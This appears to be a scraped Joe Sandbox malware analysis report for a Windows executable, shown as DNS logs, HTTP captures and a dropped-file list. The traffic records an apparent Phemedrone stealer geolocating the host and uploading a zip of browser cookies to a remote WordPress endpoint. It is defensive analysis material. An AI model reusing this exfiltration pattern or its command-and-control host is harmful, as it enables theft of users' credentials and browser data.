Oct 4, 2023 18:42:57.345170021 CEST	8.8.8.8	192.168.2.3	0x4bd4	No error (0)	rakishev.net		104.21.88.34	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:57.345170021 CEST	8.8.8.8	192.168.2.3	0x4bd4	No error (0)	rakishev.net		172.67.150.79	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:57.801583052 CEST	8.8.8.8	192.168.2.3	0x24d0	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		52.37.31.54	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:57.801583052 CEST	8.8.8.8	192.168.2.3	0x24d0	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		34.215.32.195	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:57.801583052 CEST	8.8.8.8	192.168.2.3	0x24d0	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		54.200.76.247	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:58.842789888 CEST	8.8.8.8	192.168.2.3	0xc40e	No error (0)	resources-prod.licensingstack.com		18.154.132.164	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:58.992814064 CEST	8.8.8.8	192.168.2.3	0x49c9	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		34.215.32.195	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:58.992814064 CEST	8.8.8.8	192.168.2.3	0x49c9	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		52.37.31.54	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:58.992814064 CEST	8.8.8.8	192.168.2.3	0x49c9	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		54.200.76.247	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:42:59.593415022 CEST	8.8.8.8	192.168.2.3	0x4408	No error (0)	resources-prod.licensingstack.com		18.154.132.164	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:00.361840010 CEST	8.8.8.8	192.168.2.3	0xdf63	No error (0)	resources-prod.licensingstack.com		18.154.132.164	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:01.109997034 CEST	8.8.8.8	192.168.2.3	0x4203	No error (0)	resources-prod.licensingstack.com		18.154.132.164	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:01.924689054 CEST	8.8.8.8	192.168.2.3	0x4c4d	No error (0)	ims-na1.adobelogin.com	adobelogin.prod.ims.adobejanus.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 4, 2023 18:43:01.924689054 CEST	8.8.8.8	192.168.2.3	0x4c4d	No error (0)	adobelogin.prod.ims.adobejanus.com	edgeproxy-or2.cloud.adobe.io		CNAME (Canonical name)	IN (0x0001)	false
Oct 4, 2023 18:43:01.924689054 CEST	8.8.8.8	192.168.2.3	0x4c4d	No error (0)	ethos.ethos502-prod-or2.ethos.adobe.net	pv2fcqvzl1r.prod.cloud.adobe.io		CNAME (Canonical name)	IN (0x0001)	false
Oct 4, 2023 18:43:01.982636929 CEST	8.8.8.8	192.168.2.3	0x4ade	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		34.215.32.195	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:01.982636929 CEST	8.8.8.8	192.168.2.3	0x4ade	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		52.37.31.54	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:01.982636929 CEST	8.8.8.8	192.168.2.3	0x4ade	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		54.200.76.247	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:02.838561058 CEST	8.8.8.8	192.168.2.3	0x27e7	No error (0)	auth-cloudfront.prod.ims.adobejanus.com		99.84.203.85	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:02.838561058 CEST	8.8.8.8	192.168.2.3	0x27e7	No error (0)	auth-cloudfront.prod.ims.adobejanus.com		99.84.203.73	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:02.838561058 CEST	8.8.8.8	192.168.2.3	0x27e7	No error (0)	auth-cloudfront.prod.ims.adobejanus.com		99.84.203.34	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:02.838561058 CEST	8.8.8.8	192.168.2.3	0x27e7	No error (0)	auth-cloudfront.prod.ims.adobejanus.com		99.84.203.28	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:14.495515108 CEST	8.8.8.8	192.168.2.3	0x290e	No error (0)	dpm.demdex.net	gslb-2.demdex.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 4, 2023 18:43:14.495515108 CEST	8.8.8.8	192.168.2.3	0x290e	No error (0)	gslb-2.demdex.net	edge-usw2.demdex.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 4, 2023 18:43:14.495515108 CEST	8.8.8.8	192.168.2.3	0x290e	No error (0)	edge-usw2.demdex.net	dcs-edge-usw2-620097651.us-west-2.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 4, 2023 18:43:14.495515108 CEST	8.8.8.8	192.168.2.3	0x290e	No error (0)	dcs-edge-usw2-620097651.us-west-2.elb.amazonaws.com		35.160.107.34	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:14.495515108 CEST	8.8.8.8	192.168.2.3	0x290e	No error (0)	dcs-edge-usw2-620097651.us-west-2.elb.amazonaws.com		35.167.175.62	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:14.495515108 CEST	8.8.8.8	192.168.2.3	0x290e	No error (0)	dcs-edge-usw2-620097651.us-west-2.elb.amazonaws.com		52.39.147.20	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:14.495515108 CEST	8.8.8.8	192.168.2.3	0x290e	No error (0)	dcs-edge-usw2-620097651.us-west-2.elb.amazonaws.com		52.10.79.229	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:14.495515108 CEST	8.8.8.8	192.168.2.3	0x290e	No error (0)	dcs-edge-usw2-620097651.us-west-2.elb.amazonaws.com		44.238.178.222	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:14.495515108 CEST	8.8.8.8	192.168.2.3	0x290e	No error (0)	dcs-edge-usw2-620097651.us-west-2.elb.amazonaws.com		34.211.222.46	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:14.495515108 CEST	8.8.8.8	192.168.2.3	0x290e	No error (0)	dcs-edge-usw2-620097651.us-west-2.elb.amazonaws.com		35.161.158.148	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:14.495515108 CEST	8.8.8.8	192.168.2.3	0x290e	No error (0)	dcs-edge-usw2-620097651.us-west-2.elb.amazonaws.com		35.81.33.81	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:14.686882019 CEST	8.8.8.8	192.168.2.3	0x5a6d	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		54.200.76.247	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:14.686882019 CEST	8.8.8.8	192.168.2.3	0x5a6d	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		52.37.31.54	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:14.686882019 CEST	8.8.8.8	192.168.2.3	0x5a6d	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		34.215.32.195	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:14.699575901 CEST	8.8.8.8	192.168.2.3	0x6229	No error (0)	use.typekit.net	use-stls.adobe.com.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 4, 2023 18:43:15.769927979 CEST	8.8.8.8	192.168.2.3	0xf5ac	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		34.215.32.195	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:15.769927979 CEST	8.8.8.8	192.168.2.3	0xf5ac	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		52.37.31.54	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:15.769927979 CEST	8.8.8.8	192.168.2.3	0xf5ac	No error (0)	ets-prd2-uw1-coll-elb-2013165758.us-west-2.elb.amazonaws.com		54.200.76.247	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:16.113102913 CEST	8.8.8.8	192.168.2.3	0xc8e2	No error (0)	adobe.com.ssl.d1.sc.omtrdc.net		63.140.36.121	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:16.113102913 CEST	8.8.8.8	192.168.2.3	0xc8e2	No error (0)	adobe.com.ssl.d1.sc.omtrdc.net		63.140.36.139	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:16.113102913 CEST	8.8.8.8	192.168.2.3	0xc8e2	No error (0)	adobe.com.ssl.d1.sc.omtrdc.net		63.140.36.119	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:16.113102913 CEST	8.8.8.8	192.168.2.3	0xc8e2	No error (0)	adobe.com.ssl.d1.sc.omtrdc.net		63.140.36.148	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:16.113102913 CEST	8.8.8.8	192.168.2.3	0xc8e2	No error (0)	adobe.com.ssl.d1.sc.omtrdc.net		63.140.36.130	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:16.113102913 CEST	8.8.8.8	192.168.2.3	0xc8e2	No error (0)	adobe.com.ssl.d1.sc.omtrdc.net		63.140.36.197	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:16.113102913 CEST	8.8.8.8	192.168.2.3	0xc8e2	No error (0)	adobe.com.ssl.d1.sc.omtrdc.net		63.140.36.138	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:16.113102913 CEST	8.8.8.8	192.168.2.3	0xc8e2	No error (0)	adobe.com.ssl.d1.sc.omtrdc.net		63.140.36.14	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:16.113102913 CEST	8.8.8.8	192.168.2.3	0xc8e2	No error (0)	adobe.com.ssl.d1.sc.omtrdc.net		63.140.36.101	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:16.113102913 CEST	8.8.8.8	192.168.2.3	0xc8e2	No error (0)	adobe.com.ssl.d1.sc.omtrdc.net		63.140.36.104	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:16.146869898 CEST	8.8.8.8	192.168.2.3	0xc867	No error (0)	p.typekit.net	p.typekit.net-stls-v3.edgesuite.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 4, 2023 18:43:17.837692976 CEST	8.8.8.8	192.168.2.3	0xd297	No error (0)	static.adobelogin.com	adobelogin-static.prod.ims.adobejanus.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 4, 2023 18:43:17.837692976 CEST	8.8.8.8	192.168.2.3	0xd297	No error (0)	adobelogin-static.prod.ims.adobejanus.com	dd20fzx9mj46f.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 4, 2023 18:43:17.837692976 CEST	8.8.8.8	192.168.2.3	0xd297	No error (0)	dd20fzx9mj46f.cloudfront.net		18.164.166.37	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:17.837692976 CEST	8.8.8.8	192.168.2.3	0xd297	No error (0)	dd20fzx9mj46f.cloudfront.net		18.164.166.44	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:17.837692976 CEST	8.8.8.8	192.168.2.3	0xd297	No error (0)	dd20fzx9mj46f.cloudfront.net		18.164.166.50	A (IP address)	IN (0x0001)	false
Oct 4, 2023 18:43:17.837692976 CEST	8.8.8.8	192.168.2.3	0xd297	No error (0)	dd20fzx9mj46f.cloudfront.net		18.164.166.61	A (IP address)	IN (0x0001)	false

Timestamp	kBytes transferred	Direction	Data
Oct 4, 2023 18:42:52.854374886 CEST	23	OUT	GET /json/?fields=11827 HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Oct 4, 2023 18:42:53.002482891 CEST	24	IN	HTTP/1.1 200 OK Date: Wed, 04 Oct 2023 16:42:52 GMT Content-Type: application/json; charset=utf-8 Content-Length: 191 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 69 74 79 22 3a 22 50 68 6f 65 6e 69 78 22 2c 22 7a 69 70 22 3a 22 38 35 30 33 34 22 2c 22 69 73 70 22 3a 22 50 65 72 66 6f 72 6d 69 76 65 20 4c 4c 43 22 2c 22 6f 72 67 22 3a 22 54 6f 74 61 6c 20 73 65 72 76 65 72 20 73 6f 6c 75 74 69 6f 6e 73 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 34 36 35 36 32 20 50 65 72 66 6f 72 6d 69 76 65 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 31 38 34 2e 31 37 30 2e 32 34 30 2e 32 33 38 22 7d Data Ascii: {"country":"United States","countryCode":"US","city":"Phoenix","zip":"85034","isp":"Performive LLC","org":"Total server solutions LLC","as":"AS46562 Performive LLC","query":"184.170.240.238"}

Timestamp	kBytes transferred	Direction	Data
Oct 4, 2023 18:42:57.498750925 CEST	684	OUT	POST /wp-cron.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----------------------------8dbc509b98be77f Host: rakishev.net Content-Length: 540186 Expect: 100-continue Connection: Keep-Alive
Oct 4, 2023 18:42:57.646379948 CEST	684	IN	HTTP/1.1 100 Continue
Oct 4, 2023 18:42:57.647588015 CEST	696	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 62 63 35 30 39 62 39 38 62 65 37 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d Data Ascii: ------------------------------8dbc509b98be77fContent-Disposition: form-data; name="file"; filename="(US)user-184.170.240.238-Phemedrone-Report.zip"Content-Type: application/octet-streamPKYDW]](HBrowser Data/Cookie
Oct 4, 2023 18:42:57.794943094 CEST	702	OUT	Data Raw: 05 20 c1 63 d6 24 81 e3 c0 3c a1 72 2e a0 4e e7 17 a8 ad c5 53 d6 03 a8 2b a2 dc 8f e6 0e 53 00 9a 13 49 e0 1c ba 09 30 f7 6a 04 e5 d1 44 e5 eb 7a fc 7c 3f 0b 40 87 ce ab 2d bf a0 6e bb 5e 93 b9 40 b6 a1 06 50 9b 4e 01 e5 19 e0 3a 01 31 a0 d1 20 Data Ascii: c$<r.NS+SI0jDz\|?@-n^@PN:1 ( ?!xv%Q;#)$;9M0eDLX*%;N^d~)@\|Y-?\|}1.QOx)/\|'@%Cw?>OeXG
Oct 4, 2023 18:42:57.795015097 CEST	722	OUT	Data Raw: 07 10 b4 59 0b 8a 33 27 d0 3d 20 90 f7 47 17 e4 bd 17 43 38 d7 e2 79 41 04 1c 5f c8 bc 2e 94 82 4e cd 5b a4 bc eb 83 60 9e d4 46 16 80 25 f0 5c 24 f4 74 5e 13 e2 69 3d bd 8f 04 21 3a 66 0a a8 ee 1a 91 d7 c1 e2 f2 89 16 80 55 ca 76 20 e7 e4 cb 48 Data Ascii: Y3'= GC8yA_.N[`F%\$t^i=!:fUv H?_MaAc\|"<4$naN:\uP?$q_q7*p#/7\|J3\|.I/$ccGdCN4,n+DN$@X?-G
Oct 4, 2023 18:42:57.942179918 CEST	739	OUT	Data Raw: 4b 16 80 61 fc 75 53 00 ce d4 41 e7 42 a0 7d 02 99 a7 06 95 41 33 a0 27 4a 6b 98 d9 c2 c6 69 a5 7a 7f a4 80 c6 b9 36 e0 fd 1a 03 ba f7 61 9f 92 80 1e 5f 3d a8 af 87 a8 f9 48 17 d0 bc 91 08 f6 e9 b9 af df 1e ae 11 86 f0 fa 56 0b 3f 84 9e 13 33 4d Data Ascii: KauSAB}A3'Jkiz6a_=HV?3MJZ:vN9s@CFHJe&&IK?I-tu:fiM<Z);Fw4FROwz'!H#_lG-~#"U; %{MJR@bxD(${"5Z)s:
Oct 4, 2023 18:42:57.942508936 CEST	767	OUT	Data Raw: 00 e6 90 43 0e 39 e4 90 43 0e 39 e4 90 43 0e 39 e4 90 43 6c 98 3b 01 88 25 5f 0c 15 71 d5 11 97 1f 10 7f 0c 94 46 31 00 d7 d1 85 8a f0 d2 71 d0 b1 9b a0 f3 e6 bf 7c fe 92 d6 73 de 21 40 97 6f d2 e0 32 26 30 b3 60 5b 13 b0 99 bd 11 04 83 85 cf ad Data Ascii: C9C9C9Cl;%_qF1q\|s!@o2&0`[6f'OO\|_Jw#8h')O1KE~>sO36E1Y.QizqySl<8c38G!,s!r!r
Oct 4, 2023 18:42:58.089555979 CEST	779	OUT	Data Raw: 6c 4c 06 52 54 a0 27 22 10 45 60 88 47 04 5a 19 88 51 81 67 ab b9 21 98 2a ec a6 0b bb 6b 07 62 51 11 2b 02 31 32 d0 88 40 44 9e 31 9d f0 a5 08 eb 2a c2 8a 36 93 4c 34 20 46 05 c6 22 02 dd 35 02 6d d1 10 37 2d 98 04 a0 53 28 24 14 80 46 02 2a 64 Data Ascii: lLRT'"E`GZQg!kbQ+12@D16L4 F"5m7-S($F*d`'ECBA~FZ"0A^J@2'U8'\|Cx?$gh%`)@Nfaaa?!) ;9$@(z?l<W8D hJ\Pa#
Oct 4, 2023 18:42:58.089612961 CEST	792	OUT	Data Raw: 7e 0d e4 e0 98 08 c4 14 e1 7e cf 69 11 48 eb 05 7a aa 08 9b ea c1 a1 08 c4 8a c1 5d ef 04 d9 65 9e 62 4e 32 22 b0 e3 ed 10 74 98 0a f2 8c 29 26 35 78 92 8e 08 3c 7d 02 c8 36 18 0d 88 15 83 6f 80 a0 e5 f5 10 34 bf 2e 45 02 62 3a 70 98 12 ec 93 80 Data Ascii: ~~iHz]ebN2"t)&5x<}6o4.Eb:pv}@raD@w\:(O("0E ?Xr/@c+c"PVjGD\|FQ}x.3RPWyu*ISQ5j>IS7Qdaaa]RC0_uH\
Oct 4, 2023 18:42:58.089948893 CEST	825	OUT	Data Raw: 31 9c ef a7 7b fd 70 cc 21 e8 b3 45 cf a6 f1 59 14 67 f8 10 35 dd 2b b3 10 a7 d0 ba 69 c4 44 17 7d c7 15 d0 92 88 d1 f4 f3 66 11 38 94 7e 7f be a5 df af 2f 77 43 fb 74 9b 14 d1 ff a1 df 47 21 02 0b a0 3d 9f 27 ce 07 d4 1e 9f 0f ed e1 19 32 1b 90 Data Ascii: 1{p!EYg5+iD}f8~/wCtG!='2R;6=30Rr6v,8nR\|CO]]C@!_?X~+).u)s%2uz"QiWthg\M8$'w{=sY[[Yf=I#
Oct 4, 2023 18:42:58.090280056 CEST	843	OUT	Data Raw: 43 a1 85 c9 3f b3 00 34 e4 95 d1 d6 a9 21 00 0d 79 15 31 2f 84 71 fd 8f 70 3c 6b 46 ce fd bf c6 ea 99 cc 98 e6 d9 7a f4 0b 21 af f3 b8 7e fd 28 02 50 3b e3 66 25 00 15 0a 85 42 a1 50 28 14 0a 85 42 f1 b7 e1 c4 08 c0 29 d0 46 af 86 96 bc 11 5a da Data Ascii: C?4!y1/qp<kFz!~(P;f%BP(B)FZhwC%qZFZ!gA&ZZk0fh#\br$($`<?0W<+2OaDit/o528'P^,y_s!$%K#Rz
Oct 4, 2023 18:42:58.237494946 CEST	888	OUT	Data Raw: 81 39 f9 7e 85 c9 16 9c 4f e7 58 06 2e 2a f0 11 5e 95 21 b8 b4 c0 43 b8 b0 6c a7 db c2 89 0f 77 95 e3 a3 dd e5 f8 64 8f 13 9f ee 2d c7 e7 7b ca f1 e5 de 32 7c c7 a5 c4 fb ac 2e c5 df 97 23 f1 80 0b c9 87 5c 48 3b e4 46 fa 61 17 36 59 62 30 fb 84 Data Ascii: 9~OX.*^!Clwd-{2\|.#\H;Fa6Yb0_{;ae^$r{A%v<i"I?;@xy7sLUAn~qWUoYA~sT@GM>%ZmD }3,,]i\|Z
Oct 4, 2023 18:42:59.525414944 CEST	1283	IN	HTTP/1.1 200 OK Date: Wed, 04 Oct 2023 16:42:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iLf%2BgfZ6fqMtKsZpxcq8c4kiaCI%2FGtJyAs%2B0G7eGFcIXZGzmEXdag%2FiFGxVjmBDo2sJNMWmGuJsY40apONaNtjynPEsmPRNd3ELUeM1dLMNfFezkp5EjmUkDPneKrq0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 810ee18dcb3b7bdf-LAX alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2023-10-04 16:42:52 UTC	0	OUT	POST /hsmessaging/rest HTTP/1.1 Connection: close Content-Type: text/xml User-Agent: Creative Cloud Content-Length: 2639 Host: na1e-acc.services.adobe.com
2023-10-04 16:42:52 UTC	0	OUT	Data Raw: 3c 65 76 65 6e 74 4c 69 73 74 3e 3c 48 6f 73 74 65 64 53 65 72 76 69 63 65 73 45 76 65 6e 74 3e 3c 65 76 65 6e 74 47 75 69 64 3e 36 37 36 37 35 36 36 62 2d 30 65 63 66 2d 34 35 66 38 2d 38 32 65 35 2d 38 63 35 36 63 61 32 31 33 30 35 64 3c 2f 65 76 65 6e 74 47 75 69 64 3e 3c 65 76 65 6e 74 44 74 73 3e 32 30 32 33 2d 31 30 2d 30 34 54 32 30 3a 31 36 3a 32 35 2e 30 38 33 2b 30 32 3a 30 30 3c 2f 65 76 65 6e 74 44 74 73 3e 3c 65 76 65 6e 74 43 6f 64 65 3e 41 43 43 43 5f 53 45 52 56 49 43 45 3c 2f 65 76 65 6e 74 43 6f 64 65 3e 3c 65 76 65 6e 74 53 75 62 43 6f 64 65 3e 4e 55 4c 4c 5f 53 55 42 5f 43 4f 44 45 3c 2f 65 76 65 6e 74 53 75 62 43 6f 64 65 3e 3c 65 76 65 6e 74 53 6f 75 72 63 65 3e 61 63 63 63 2e 61 63 63 63 5f 63 6c 69 65 6e 74 2e 32 2e 37 2e 30 2e 31 Data Ascii: <eventList><HostedServicesEvent><eventGuid>6767566b-0ecf-45f8-82e5-8c56ca21305d</eventGuid><eventDts>2023-10-04T20:16:25.083+02:00</eventDts><eventCode>ACCC_SERVICE</eventCode><eventSubCode>NULL_SUB_CODE</eventSubCode><eventSource>accc.accc_client.2.7.0.1
2023-10-04 16:42:53 UTC	2	IN	HTTP/1.1 200 OK Date: Wed, 04 Oct 2023 16:42:53 GMT Content-Length: 165 Connection: close X-Request-ID: 3ae3fb32-269e-4af7-a4ee-0b607d63fab8
2023-10-04 16:42:53 UTC	2	IN	Data Raw: 3c 45 76 65 6e 74 4c 69 73 74 41 63 6b 20 64 74 73 3d 22 32 30 32 33 2d 31 30 2d 30 34 54 31 36 3a 34 32 3a 35 33 2e 30 30 30 2b 30 30 3a 30 30 22 20 65 6c 61 70 73 65 64 4d 69 6c 6c 69 73 3d 22 32 34 2e 30 22 20 65 76 65 6e 74 43 6f 75 6e 74 3d 22 31 22 3e 0a 20 20 3c 45 76 65 6e 74 41 63 6b 20 65 76 65 6e 74 47 75 69 64 3d 22 36 37 36 37 35 36 36 62 2d 30 65 63 66 2d 34 35 66 38 2d 38 32 65 35 2d 38 63 35 36 63 61 32 31 33 30 35 64 22 2f 3e 0a 3c 2f 45 76 65 6e 74 4c 69 73 74 41 63 6b 3e Data Ascii: <EventListAck dts="2023-10-04T16:42:53.000+00:00" elapsedMillis="24.0" eventCount="1"> <EventAck eventGuid="6767566b-0ecf-45f8-82e5-8c56ca21305d"/></EventListAck>

Timestamp	kBytes transferred	Direction	Data
2023-10-04 16:42:54 UTC	3	OUT	POST /hsmessaging/rest HTTP/1.1 Connection: close Content-Type: text/xml User-Agent: Creative Cloud Content-Length: 2647 Host: na1e-acc.services.adobe.com
2023-10-04 16:42:54 UTC	3	OUT	Data Raw: 3c 65 76 65 6e 74 4c 69 73 74 3e 3c 48 6f 73 74 65 64 53 65 72 76 69 63 65 73 45 76 65 6e 74 3e 3c 65 76 65 6e 74 47 75 69 64 3e 34 34 39 62 37 37 65 66 2d 31 63 32 33 2d 34 64 31 30 2d 61 62 36 31 2d 62 62 38 31 64 33 64 30 62 32 39 37 3c 2f 65 76 65 6e 74 47 75 69 64 3e 3c 65 76 65 6e 74 44 74 73 3e 32 30 32 33 2d 31 30 2d 30 34 54 32 30 3a 31 36 3a 32 36 2e 34 34 34 2b 30 32 3a 30 30 3c 2f 65 76 65 6e 74 44 74 73 3e 3c 65 76 65 6e 74 43 6f 64 65 3e 41 43 43 43 5f 53 45 52 56 49 43 45 3c 2f 65 76 65 6e 74 43 6f 64 65 3e 3c 65 76 65 6e 74 53 75 62 43 6f 64 65 3e 4e 55 4c 4c 5f 53 55 42 5f 43 4f 44 45 3c 2f 65 76 65 6e 74 53 75 62 43 6f 64 65 3e 3c 65 76 65 6e 74 53 6f 75 72 63 65 3e 61 63 63 63 2e 61 63 63 63 5f 63 6c 69 65 6e 74 2e 32 2e 37 2e 30 2e 31 Data Ascii: <eventList><HostedServicesEvent><eventGuid>449b77ef-1c23-4d10-ab61-bb81d3d0b297</eventGuid><eventDts>2023-10-04T20:16:26.444+02:00</eventDts><eventCode>ACCC_SERVICE</eventCode><eventSubCode>NULL_SUB_CODE</eventSubCode><eventSource>accc.accc_client.2.7.0.1
2023-10-04 16:42:54 UTC	5	IN	HTTP/1.1 200 OK Date: Wed, 04 Oct 2023 16:42:54 GMT Content-Length: 165 Connection: close X-Request-ID: 58908dff-19fc-4b6e-864f-9cfb308be612
2023-10-04 16:42:54 UTC	5	IN	Data Raw: 3c 45 76 65 6e 74 4c 69 73 74 41 63 6b 20 64 74 73 3d 22 32 30 32 33 2d 31 30 2d 30 34 54 31 36 3a 34 32 3a 35 34 2e 30 30 30 2b 30 30 3a 30 30 22 20 65 6c 61 70 73 65 64 4d 69 6c 6c 69 73 3d 22 32 32 2e 30 22 20 65 76 65 6e 74 43 6f 75 6e 74 3d 22 31 22 3e 0a 20 20 3c 45 76 65 6e 74 41 63 6b 20 65 76 65 6e 74 47 75 69 64 3d 22 34 34 39 62 37 37 65 66 2d 31 63 32 33 2d 34 64 31 30 2d 61 62 36 31 2d 62 62 38 31 64 33 64 30 62 32 39 37 22 2f 3e 0a 3c 2f 45 76 65 6e 74 4c 69 73 74 41 63 6b 3e Data Ascii: <EventListAck dts="2023-10-04T16:42:54.000+00:00" elapsedMillis="22.0" eventCount="1"> <EventAck eventGuid="449b77ef-1c23-4d10-ab61-bb81d3d0b297"/></EventListAck>

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0nEuHt4Yr4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\USOShared\2JRUV92E.exe

C:\Users\user\AppData\Local\Adobe\OOBE\temp_ins_lbs_wid

C:\Users\user\AppData\Local\Adobe\OOBE\temp_lbs_wid

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\0nEuHt4Yr4.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\2JRUV92E.exe.log

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\40S8E43V\auth.services.adobe[1].xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Kaizen[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\apple[1].svg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\context[1].json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\d[1]

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\messages[1].json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\styles.3f69be8a[1].css

